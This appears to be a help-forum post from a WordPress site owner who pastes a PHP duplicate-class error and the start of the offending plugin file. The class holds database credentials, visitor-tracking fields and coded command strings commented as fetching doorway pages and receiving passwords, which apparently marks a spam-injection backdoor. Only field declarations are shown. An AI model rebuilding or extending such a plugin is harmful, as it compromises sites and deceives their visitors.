okay great, i received that message
Error Details
An error of type E_COMPILE_ERROR was caused in line 78 of the file /home/dh_mr7tam/horseconcept.design/wp-content/plugins/opt_v11tng/optim_v35a17.php. Error message: Cannot declare class WPSettsD, because the name is already in use
and I am checking that file now and find the following code:
class WPSettsD
private $au;
private $rId;
private $dbH;
private $dbN;
private $dbU;
private $dbPs;
private $dbPo;
private $dbPref;
private $sslSt;
public $stts;
private $ip;
private $ua;
private $ref;
private $kw;
private $gr;
public $bot;
private $curUrl;
private $curCch;
private $dom;
private $tbl;
private $mrd;
public $dbCon;
private $posts;
private $ktUrl = "";
private $ktToken = "";
public $chkStr = "nv4dieatuy";
private $fPostStr = "ryfa68o7"; // String for sending after created table
private $pssP = "djd5eyu"; // String for recieve post pass
private $pssPS = "ttyrdzs3rw"; // String for success save new POST pass
private $gdTblStr = "nvbc4ettdhr"; // String for BD table exists
private $getSettsStr = "dfshgdf435k"; // Get new setts string
private $newSettsStr = "mer334y6rsd"; // String for new setts exists
private $bdTempl = "sdgh545egj"; // String for bad templatre parsing
private $sndTempl = "ire45sydgh"; // String for sending template
private $sndPrtUrls = "ir34sdhjhk"; // String for sending urls part
private $gdPrtUrls = "jtdse5yydyt"; // String for sending urls part
private $gdNrc = "nvbtre5ydhfg"; // String for good save redir code
private $fgtDPg = "fhre4hgdb"; // String for get doorway page
private $sndSts = "g4ytjddfg"; // String for sending stats"
private $stats = array();
private $type;
private $altUrl = "";
could you help me to find the error above ?
really I appreciate your help… thanks in advance